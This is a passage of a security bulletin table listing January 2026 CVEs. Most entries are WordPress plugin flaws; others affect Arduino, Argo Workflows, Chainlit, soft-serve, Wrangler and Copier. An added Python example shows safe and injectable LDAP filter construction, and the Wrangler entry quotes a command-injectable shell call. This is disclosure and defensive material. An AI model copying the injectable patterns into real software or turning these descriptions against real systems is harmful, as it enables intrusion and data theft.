| ApusTheme--Drone | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ApusTheme Drone drone allows Reflected XSS. This issue affects Drone: from n/a through <= 1.40. | 2026-01-22 | not yet calculated | CVE-2025-49249 | https://patchstack.com/database/Wordpress/Theme/drone/vulnerability/wordpress-drone-theme-1-40-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| arduino--ArduinoCore-avr | ArduinoCore-avr contains the source code and configuration files of the Arduino AVR Boards platform. A vulnerability in versions prior to 1.8.7 allows an attacker to trigger a stack-based buffer overflow when converting floating-point values to strings with high precision. By passing very large `decimalPlaces` values to the affected String constructors or concat methods, the `dtostrf` function writes beyond fixed-size stack buffers, causing memory corruption and denial of service. Under specific conditions, this could enable arbitrary code execution on AVR-based Arduino boards. ### Patches - The Fix is included starting from the `1.8.7` release available from the following link [ArduinoCore-avr v1.8.7](https://github.com/arduino/ArduinoCore-avr) - The Fixing Commit is available at the following link [1a6a417f89c8901dad646efce74ae9d3ddebfd59](https://github.com/arduino/ArduinoCore-avr/pull/613/commits/1a6a417f89c8901dad646efce74ae9d3ddebfd59) ### References - [ASEC-26-001 ArduinoCore-avr vXXXX Resolves Buffer Overflow Vulnerability](https://support.arduino.cc/hc/en-us/articles/XXXXX) ### Credits - Maxime Rossi Bellom and Ramtine Tofighi Shirazi from SecMate (https://secmate.dev/) | 2026-01-21 | not yet calculated | CVE-2025-69209 | https://github.com/arduino/ArduinoCore-avr/security/advisories/GHSA-pvx3-fm7w-6hjm https://github.com/arduino/ArduinoCore-avr/pull/613 https://github.com/arduino/ArduinoCore-avr/commit/82a8ad2fb33911d8927c7af22e0472b94325d1a7 https://github.com/arduino/ArduinoCore-avr/releases/tag/1.8.7 https://support.arduino.cc/hc/en-us/articles/24985906702748-ASEC-26-001-ArduinoCore-AVR-v1-8-7-Resolves-Stack-Based-Buffer-Overflow-Vulnerability |
| Arevico--WP Simple Redirect | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arevico WP Simple Redirect wp-simple-redirect allows Reflected XSS. This issue affects WP Simple Redirect: from n/a through <= 1.1. | 2026-01-22 | not yet calculated | CVE-2025-68884 | https://patchstack.com/database/Wordpress/Plugin/wp-simple-redirect/vulnerability/wordpress-wp-simple-redirect-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user's browser under the Argo Server origin, enabling API actions with the victim's privileges. Versions 3.6.17 and 3.7.8 fix the issue. | 2026-01-21 | not yet calculated | CVE-2026-23960 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82 https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17 https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244 https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17 https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8 |
| Arksine--moonraker | Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0. | 2026-01-22 | not yet calculated | CVE-2026-24130 | https://github.com/Arksine/moonraker/security/advisories/GHSA-3jqf-v4mv-747g https://github.com/Arksine/moonraker/commit/74c5d8e44c4a4abbfbb06fb991e7ebb9ac947f42 |
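LDAP filter injection of the kind described in the Moonraker entry above comes from interpolating a login name into filter syntax unescaped. The block below is an added example, not Moonraker code: it escapes the characters RFC 4515 reserves and shows the unescaped pattern beside it. The filter template, attribute names and sample inputs are constructed.

```python
"""Added example, not Moonraker code: RFC 4515 escaping for values placed in an
LDAP search filter, beside the injectable pattern. Filter template, attribute
names and sample inputs are constructed for this illustration."""

_FILTER_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_ldap_filter(value: str) -> str:
    """RFC 4515 section 3: backslash, *, (, ) and NUL become \\XX hex escapes.
    Other characters pass through; the grammar accepts UTF-8 in values."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_unsafe(username: str) -> str:
    """The injectable pattern: the raw name lands inside the filter syntax."""
    return f"(&(objectClass=person)(uid={username}))"


def login_filter_safe(username: str) -> str:
    return f"(&(objectClass=person)(uid={escape_ldap_filter(username)}))"


def is_probe(username: str) -> bool:
    """Pre-check for the enumeration pattern the advisory describes: wildcards
    walked one letter at a time ("a*", "ab*", ...) against the login response."""
    return any(ch in username for ch in "*()\\\x00")
```

Escaping closes the injection but not the oracle: if the 401 message still differs depending on whether the search matched, a caller can enumerate entries with ordinary names. Return one fixed failure message for "no such user" and "wrong password" alike. Where python-ldap is in use, `ldap.filter.escape_filter_chars` implements the same escaping; DN components need the different RFC 4514 rules.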
| Arraytics--Eventin | Deserialization of Untrusted Data vulnerability in Arraytics Eventin wp-event-solution allows Object Injection. This issue affects Eventin: from n/a through <= 4.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68047 | https://patchstack.com/database/Wordpress/Plugin/wp-event-solution/vulnerability/wordpress-eventin-plugin-4-0-52-php-object-injection-vulnerability?_s_id=cve |
| artbees--JupiterX Core | Deserialization of Untrusted Data vulnerability in artbees JupiterX Core jupiterx-core allows Object Injection. This issue affects JupiterX Core: from n/a through <= 4.10.1. | 2026-01-22 | not yet calculated | CVE-2025-50004 | https://patchstack.com/database/Wordpress/Plugin/jupiterx-core/vulnerability/wordpress-jupiterx-core-plugin-4-10-1-php-object-injection-vulnerability?_s_id=cve |
| artplacer--ArtPlacer Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Stored XSS. This issue affects ArtPlacer Widget: from n/a through <= 2.23.1. | 2026-01-23 | not yet calculated | CVE-2026-24555 | https://patchstack.com/database/Wordpress/Plugin/artplacer-widget/vulnerability/wordpress-artplacer-widget-plugin-2-23-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Arul Prasad J--WP Quick Post Duplicator | Missing Authorization vulnerability in Arul Prasad J WP Quick Post Duplicator wp-quick-post-duplicator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Quick Post Duplicator: from n/a through <= 2.1. | 2026-01-22 | not yet calculated | CVE-2026-24387 | https://patchstack.com/database/Wordpress/Plugin/wp-quick-post-duplicator/vulnerability/wordpress-wp-quick-post-duplicator-plugin-2-1-broken-access-control-vulnerability?_s_id=cve |
| Ashan Perera--LifePress | Missing Authorization vulnerability in Ashan Perera LifePress lifepress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects LifePress: from n/a through <= 2.1.3. | 2026-01-23 | not yet calculated | CVE-2026-24563 | https://patchstack.com/database/Wordpress/Plugin/lifepress/vulnerability/wordpress-lifepress-plugin-2-1-3-broken-access-control-vulnerability-2?_s_id=cve |
| Atomberg--Atomberg | An issue in the Atomberg Erica Smart Fan, firmware version V1.0.36, allows an attacker to obtain sensitive information and escalate privileges via a crafted deauth frame. | 2026-01-22 | not yet calculated | CVE-2025-69822 | https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment/blob/main/Atomberg_Erica_SmatFan_Security_Assessment_Report.pdf https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment.git |
| Automated Logic--WebCTRL | Storing Passwords in a Recoverable Format vulnerability in Automated Logic WebCTRL on Windows, Carrier i-Vu on Windows. Storing Passwords in a Recoverable Format vulnerability (CWE-257) in the Web session management component allows an attacker to access stored passwords in a recoverable format which makes them subject to password reuse attacks by malicious users. This issue affects WebCTRL: from 6.0 through 9.0; i-Vu: from 6.0 through 9.0. | 2026-01-22 | not yet calculated | CVE-2025-14295 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| averta--Depicter Slider | Missing Authorization vulnerability in averta Depicter Slider depicter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Depicter Slider: from n/a through <= 4.0.4. | 2026-01-22 | not yet calculated | CVE-2025-68558 | https://patchstack.com/database/Wordpress/Plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-4-0-4-broken-access-control-vulnerability?_s_id=cve |
| axiomthemes--Amuli | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Amuli amuli allows PHP Local File Inclusion. This issue affects Amuli: from n/a through <= 2.3.0. | 2026-01-22 | not yet calculated | CVE-2025-50003 | https://patchstack.com/database/Wordpress/Theme/amuli/vulnerability/wordpress-amuli-theme-2-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| ayecode--Restaurante | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ayecode Restaurante restaurante allows Reflected XSS. This issue affects Restaurante: from n/a through <= 3.0.7. | 2026-01-22 | not yet calculated | CVE-2025-52746 | https://patchstack.com/database/Wordpress/Theme/restaurante/vulnerability/wordpress-restaurante-theme-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bdtask--Isshue | HTML Injection vulnerability in Isshue by Bdtask, consisting of an HTML injection due to a lack of proper validation of user input by sending a POST request to '/category_product_search', affecting the 'product_name' parameter. | 2026-01-20 | not yet calculated | CVE-2025-40679 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/html-injection-isshue-bdtask |
| bdthemes--Element Pack Elementor Addons | Cross-Site Request Forgery (CSRF) vulnerability in bdthemes Element Pack Elementor Addons bdthemes-element-pack-lite allows Cross Site Request Forgery. This issue affects Element Pack Elementor Addons: from n/a through <= 8.3.13. | 2026-01-22 | not yet calculated | CVE-2025-31413 | https://patchstack.com/database/Wordpress/Plugin/bdthemes-element-pack-lite/vulnerability/wordpress-element-pack-elementor-addons-plugin-8-3-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Beam--Beam | Directory Traversal vulnerability in Beam beta9 v.0.1.552 allows a remote attacker to obtain sensitive information via the joinCleanPath function. | 2026-01-22 | not yet calculated | CVE-2025-69820 | https://github.com/aws/aws-sdk-php/security/advisories/GHSA-557v-xcg6-rm5m https://github.com/ryotaromatsui/CVEs/tree/main/CVE-2025-69820 https://github.com/beam-cloud/beta9/blob/c1cd75e813cf7d53e916157d920099e89ef45caa/pkg/abstractions/volume/multipart.go#L45 |
| Beaver Builder--Beaver Builder | Improper Control of Generation of Code ('Code Injection') vulnerability in Beaver Builder Beaver Builder beaver-builder-lite-version allows Code Injection. This issue affects Beaver Builder: from n/a through <= 2.9.4.1. | 2026-01-22 | not yet calculated | CVE-2025-69319 | https://patchstack.com/database/Wordpress/Plugin/beaver-builder-lite-version/vulnerability/wordpress-beaver-builder-plugin-2-9-4-1-arbitrary-code-execution-vulnerability?_s_id=cve |
| Benjamin Intal--Stackable | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Intal Stackable stackable-ultimate-gutenberg-blocks allows Stored XSS. This issue affects Stackable: from n/a through <= 3.19.5. | 2026-01-22 | not yet calculated | CVE-2025-47500 | https://patchstack.com/database/Wordpress/Plugin/stackable-ultimate-gutenberg-blocks/vulnerability/wordpress-stackable-plugin-3-19-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bestwebsoft--Multilanguage by BestWebSoft | Missing Authorization vulnerability in bestwebsoft Multilanguage by BestWebSoft multilanguage allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Multilanguage by BestWebSoft: from n/a through <= 1.5.2. | 2026-01-23 | not yet calculated | CVE-2026-24598 | https://patchstack.com/database/Wordpress/Plugin/multilanguage/vulnerability/wordpress-multilanguage-by-bestwebsoft-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve |
| Binance--Binance | A buffer over-read in the PublicKey::verify() method of Binance - Trust Wallet Core before commit 5668c67 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-01-20 | not yet calculated | CVE-2025-66692 | https://github.com/trustwallet/wallet-core/commit/5668c67 https://gist.github.com/inkman97/b791189338f73b758c31a7db3cd50c2d |
| binary-parser--binary-parser | A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. The library directly interpolates these values into dynamically generated code without sanitization, enabling attackers to execute arbitrary code in the context of the Node.js process. | 2026-01-20 | not yet calculated | CVE-2026-1245 | https://github.com/keichi/binary-parser/pull/283 https://github.com/keichi/binary-parser https://www.npmjs.com/package/binary-parser https://kb.cert.org/vuls/id/102648 |
| blazethemes--Blogistic | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogistic blogistic allows Using Malicious Files. This issue affects Blogistic: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-68909 | https://patchstack.com/database/Wordpress/Theme/blogistic/vulnerability/wordpress-blogistic-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve |
| blazethemes--Blogmatic | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogmatic blogmatic. This issue affects Blogmatic: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-62050 | https://patchstack.com/database/Wordpress/Theme/blogmatic/vulnerability/wordpress-blogmatic-theme-1-0-3-arbitrary-file-upload-vulnerability?_s_id=cve |
| blazethemes--Blogzee | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogzee blogzee allows Using Malicious Files. This issue affects Blogzee: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-68910 | https://patchstack.com/database/Wordpress/Theme/blogzee/vulnerability/wordpress-blogzee-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve |
| blazethemes--News Event | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes News Event news-event. This issue affects News Event: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-62056 | https://patchstack.com/database/Wordpress/Theme/news-event/vulnerability/wordpress-news-event-theme-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve |
| Booking Activities Team--Booking Activities | Incorrect Privilege Assignment vulnerability in Booking Activities Team Booking Activities booking-activities allows Privilege Escalation. This issue affects Booking Activities: from n/a through <= 1.16.44. | 2026-01-22 | not yet calculated | CVE-2025-67953 | https://patchstack.com/database/Wordpress/Plugin/booking-activities/vulnerability/wordpress-booking-activities-plugin-1-16-44-privilege-escalation-vulnerability?_s_id=cve |
| bookingalgorithms--BA Book Everything | Missing Authorization vulnerability in bookingalgorithms BA Book Everything ba-book-everything allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BA Book Everything: from n/a through <= 1.8.16. | 2026-01-22 | not yet calculated | CVE-2026-24371 | https://patchstack.com/database/Wordpress/Plugin/ba-book-everything/vulnerability/wordpress-ba-book-everything-plugin-1-8-16-broken-access-control-vulnerability?_s_id=cve |
| Boopathi Rajan--WP Test Email | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS. This issue affects WP Test Email: from n/a through <= 1.1.7. | 2026-01-22 | not yet calculated | CVE-2025-69102 | https://patchstack.com/database/Wordpress/Plugin/wp-test-email/vulnerability/wordpress-wp-test-email-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Botble--TransP | HTML injection vulnerability in multiple Botble products such as TransP, Athena, Martfury, and Homzen, consisting of an HTML injection due to a lack of proper validation of user input by sending a request to '/search' using the 'q' parameter. | 2026-01-20 | not yet calculated | CVE-2026-1183 | https://www.incibe.es/en/incibe-cert/notices/aviso/html-injection-multiple-botble-products |
| boxnow--BOX NOW Delivery | Missing Authorization vulnerability in boxnow BOX NOW Delivery box-now-delivery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BOX NOW Delivery: from n/a through <= 3.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24571 | https://patchstack.com/database/Wordpress/Plugin/box-now-delivery/vulnerability/wordpress-box-now-delivery-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| bPlugins--B Accordion | Insertion of Sensitive Information Into Sent Data vulnerability in bPlugins B Accordion b-accordion allows Retrieve Embedded Sensitive Data. This issue affects B Accordion: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24565 | https://patchstack.com/database/Wordpress/Plugin/b-accordion/vulnerability/wordpress-b-accordion-plugin-2-0-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| bPlugins--B Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins B Slider b-slider allows DOM-Based XSS. This issue affects B Slider: from n/a through <= 2.0.6. | 2026-01-22 | not yet calculated | CVE-2026-24383 | https://patchstack.com/database/Wordpress/Plugin/b-slider/vulnerability/wordpress-b-slider-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brecht--WP Recipe Maker | Missing Authorization vulnerability in Brecht WP Recipe Maker wp-recipe-maker allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Recipe Maker: from n/a through <= 10.2.4. | 2026-01-22 | not yet calculated | CVE-2026-24357 | https://patchstack.com/database/Wordpress/Plugin/wp-recipe-maker/vulnerability/wordpress-wp-recipe-maker-plugin-10-2-4-broken-access-control-vulnerability?_s_id=cve |
| briarinc--Anything Order by Terms | Missing Authorization vulnerability in briarinc Anything Order by Terms anything-order-by-terms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Anything Order by Terms: from n/a through <= 1.4.0. | 2026-01-23 | not yet calculated | CVE-2026-24567 | https://patchstack.com/database/Wordpress/Plugin/anything-order-by-terms/vulnerability/wordpress-anything-order-by-terms-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve |
| Broadstreet--Broadstreet Ads | Missing Authorization vulnerability in Broadstreet Broadstreet Ads broadstreet allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Broadstreet Ads: from n/a through <= 1.52.1. | 2026-01-22 | not yet calculated | CVE-2025-69311 | https://patchstack.com/database/Wordpress/Plugin/broadstreet/vulnerability/wordpress-broadstreet-ads-plugin-1-52-1-broken-access-control-vulnerability?_s_id=cve |
| bslthemes--Myour | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in bslthemes Myour myour allows PHP Local File Inclusion. This issue affects Myour: from n/a through <= 1.5.1. | 2026-01-22 | not yet calculated | CVE-2025-67615 | https://patchstack.com/database/Wordpress/Theme/myour/vulnerability/wordpress-myour-theme-1-5-1-local-file-inclusion-vulnerability?_s_id=cve |
| BZOTheme--Mella | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme Mella mella allows PHP Local File Inclusion. This issue affects Mella: from n/a through <= 1.2.29. | 2026-01-22 | not yet calculated | CVE-2025-67616 | https://patchstack.com/database/Wordpress/Theme/mella/vulnerability/wordpress-mella-theme-1-2-29-local-file-inclusion-vulnerability?_s_id=cve |
| cardpaysolutions--Payment Gateway Authorize.Net CIM for WooCommerce | Missing Authorization vulnerability in cardpaysolutions Payment Gateway Authorize.Net CIM for WooCommerce authnet-cim-for-woo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway Authorize.Net CIM for WooCommerce: from n/a through <= 2.1.2. | 2026-01-22 | not yet calculated | CVE-2025-68013 | https://patchstack.com/database/Wordpress/Plugin/authnet-cim-for-woo/vulnerability/wordpress-payment-gateway-authorize-net-cim-for-woocommerce-plugin-2-1-2-arbitrary-content-deletion-vulnerability?_s_id=cve |
| Cargus eCommerce--Cargus | Insertion of Sensitive Information Into Sent Data vulnerability in Cargus eCommerce Cargus cargus allows Retrieve Embedded Sensitive Data. This issue affects Cargus: from n/a through <= 1.5.8. | 2026-01-23 | not yet calculated | CVE-2026-24589 | https://patchstack.com/database/Wordpress/Plugin/cargus/vulnerability/wordpress-cargus-plugin-1-5-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| Casey Bisson--wpCAS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Casey Bisson wpCAS wpcas allows Reflected XSS. This issue affects wpCAS: from n/a through <= 1.07. | 2026-01-22 | not yet calculated | CVE-2025-68858 | https://patchstack.com/database/Wordpress/Plugin/wpcas/vulnerability/wordpress-wpcas-plugin-1-0-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Chainlit--Chainlit | Chainlit versions prior to 2.9.4 contain an arbitrary file read vulnerability in the /project/element update flow. An authenticated client can send a custom Element with a user-controlled path value, causing the server to copy the referenced file into the attacker's session. The resulting element identifier (chainlitKey) can then be used to retrieve the file contents via /project/file/<chainlitKey>, allowing disclosure of any file readable by the Chainlit service. | 2026-01-19 | not yet calculated | CVE-2026-22218 | https://github.com/Chainlit/chainlit/releases/tag/2.9.4 https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover https://www.vulncheck.com/advisories/chainlit-arbitrary-file-read-via-project-element |
| Chainlit--Chainlit | Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider. | 2026-01-19 | not yet calculated | CVE-2026-22219 | https://github.com/Chainlit/chainlit/releases/tag/2.9.4 https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover https://www.vulncheck.com/advisories/chainlit-sqlalchemy-data-layer-ssrf-via-project-element |
| Chandni Patel--WP MapIt | Missing Authorization vulnerability in Chandni Patel WP MapIt wp-mapit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP MapIt: from n/a through <= 3.0.3. | 2026-01-22 | not yet calculated | CVE-2026-22466 | https://patchstack.com/database/Wordpress/Plugin/wp-mapit/vulnerability/wordpress-wp-mapit-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve |
| charmbracelet--soft-serve | Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by "offering" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the "offer" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3. | 2026-01-22 | not yet calculated | CVE-2026-24058 | https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-pchf-49fh-w34r https://github.com/charmbracelet/soft-serve/commit/8539f9ad39918b67d612a35785a2b4326efc8741 https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.3 |
| Chris Simmons--WP BackItUp | Missing Authorization vulnerability in Chris Simmons WP BackItUp wp-backitup allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP BackItUp: from n/a through <= 2.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68039 | https://patchstack.com/database/Wordpress/Plugin/wp-backitup/vulnerability/wordpress-wp-backitup-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| cjjparadoxmax--Synergy Project Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cjjparadoxmax Synergy Project Manager synergy-project-manager allows Stored XSS. This issue affects Synergy Project Manager: from n/a through <= 1.5. | 2026-01-22 | not yet calculated | CVE-2025-68898 | https://patchstack.com/database/Wordpress/Plugin/synergy-project-manager/vulnerability/wordpress-synergy-project-manager-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| cleverplugins--SEO Booster | Missing Authorization vulnerability in cleverplugins SEO Booster seo-booster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SEO Booster: from n/a through <= 6.1.8. | 2026-01-22 | not yet calculated | CVE-2025-68019 | https://patchstack.com/database/Wordpress/Plugin/seo-booster/vulnerability/wordpress-seo-booster-plugin-6-1-8-broken-access-control-vulnerability?_s_id=cve |
| CleverReach--CleverReach WP | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CleverReach® CleverReach® WP cleverreach-wp allows SQL Injection. This issue affects CleverReach® WP: from n/a through <= 1.5.22. | 2026-01-22 | not yet calculated | CVE-2025-68034 | https://patchstack.com/database/Wordpress/Plugin/cleverreach-wp/vulnerability/wordpress-cleverreach-wp-plugin-1-5-22-sql-injection-vulnerability?_s_id=cve |
| CleverSoft--Anon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CleverSoft Anon anon2x allows Reflected XSS. This issue affects Anon: from n/a through <= 2.2.10. | 2026-01-22 | not yet calculated | CVE-2025-67620 | https://patchstack.com/database/Wordpress/Theme/anon2x/vulnerability/wordpress-anon-theme-2-2-10-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cloudflare--Wrangler | Summary: A command injection vulnerability (CWE-78) has been found to exist in the `wrangler pages deploy` command. The issue occurs because the `--commit-hash` parameter is passed directly to a shell command without proper validation or sanitization, allowing an attacker with control of `--commit-hash` to execute arbitrary commands on the system running Wrangler. Root cause: The commitHash variable, derived from user input via the --commit-hash CLI argument, is interpolated directly into a shell command using template literals (e.g., execSync(`git show -s --format=%B ${commitHash}`)). Shell metacharacters are interpreted by the shell, enabling command execution. Impact: This vulnerability is generally hard to exploit, as it requires --commit-hash to be attacker controlled. The vulnerability primarily affects CI/CD environments where `wrangler pages deploy` is used in automated pipelines and the --commit-hash parameter is populated from external, potentially untrusted sources. An attacker could exploit this to: run any shell command; exfiltrate environment variables; compromise the CI runner to install backdoors or modify build artifacts. Credits: Disclosed responsibly by kny4hacker. Mitigation: Wrangler v4 users are requested to upgrade to Wrangler v4.59.1 or higher; Wrangler v3 users are requested to upgrade to Wrangler v3.114.17 or higher; users on Wrangler v2 (EOL) should upgrade to a supported major version. | 2026-01-20 | not yet calculated | CVE-2026-0933 | https://github.com/cloudflare/workers-sdk |
| Cloudinary--Cloudinary | Missing Authorization vulnerability in Cloudinary Cloudinary cloudinary-image-management-and-manipulation-in-the-cloud-cdn allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cloudinary: from n/a through <= 3.3.0. | 2026-01-23 | not yet calculated | CVE-2026-24560 | https://patchstack.com/database/Wordpress/Plugin/cloudinary-image-management-and-manipulation-in-the-cloud-cdn/vulnerability/wordpress-cloudinary-plugin-3-3-0-broken-access-control-vulnerability?_s_id=cve |
| CloudPanel--CLP Varnish Cache | Missing Authorization vulnerability in CloudPanel CLP Varnish Cache clp-varnish-cache allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CLP Varnish Cache: from n/a through <= 1.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24525 | https://patchstack.com/database/Wordpress/Plugin/clp-varnish-cache/vulnerability/wordpress-clp-varnish-cache-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| Codeless--Slider Templates | Missing Authorization vulnerability in Codeless Slider Templates slider-templates allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Slider Templates: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-68009 | https://patchstack.com/database/Wordpress/Plugin/slider-templates/vulnerability/wordpress-slider-templates-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| codisto--Omnichannel for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codisto Omnichannel for WooCommerce codistoconnect allows Stored XSS. This issue affects Omnichannel for WooCommerce: from n/a through <= 1.3.65. | 2026-01-22 | not yet calculated | CVE-2025-68041 | https://patchstack.com/database/Wordpress/Plugin/codistoconnect/vulnerability/wordpress-omnichannel-for-woocommerce-plugin-1-3-65-cross-site-scripting-xss-vulnerability?_s_id=cve |
| COP--UX Flat | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in COP UX Flat ux-flat allows Stored XSS. This issue affects UX Flat: from n/a through <= 5.4.0. | 2026-01-23 | not yet calculated | CVE-2026-24576 | https://patchstack.com/database/Wordpress/Plugin/ux-flat/vulnerability/wordpress-ux-flat-plugin-5-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| copier-org--copier | Copier is a library and CLI app for rendering project templates. Prior to version 9.11.2, Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with `_preserve_symlinks: false` (which is Copier's default setting). Version 9.11.2 patches the issue. | 2026-01-21 | not yet calculated | CVE-2026-23968 | https://github.com/copier-org/copier/security/advisories/GHSA-xjhm-gp88-8pfx https://github.com/copier-org/copier/commit/b3a7b3772d17cf0e7a4481978188c9f536c8d8f6 |
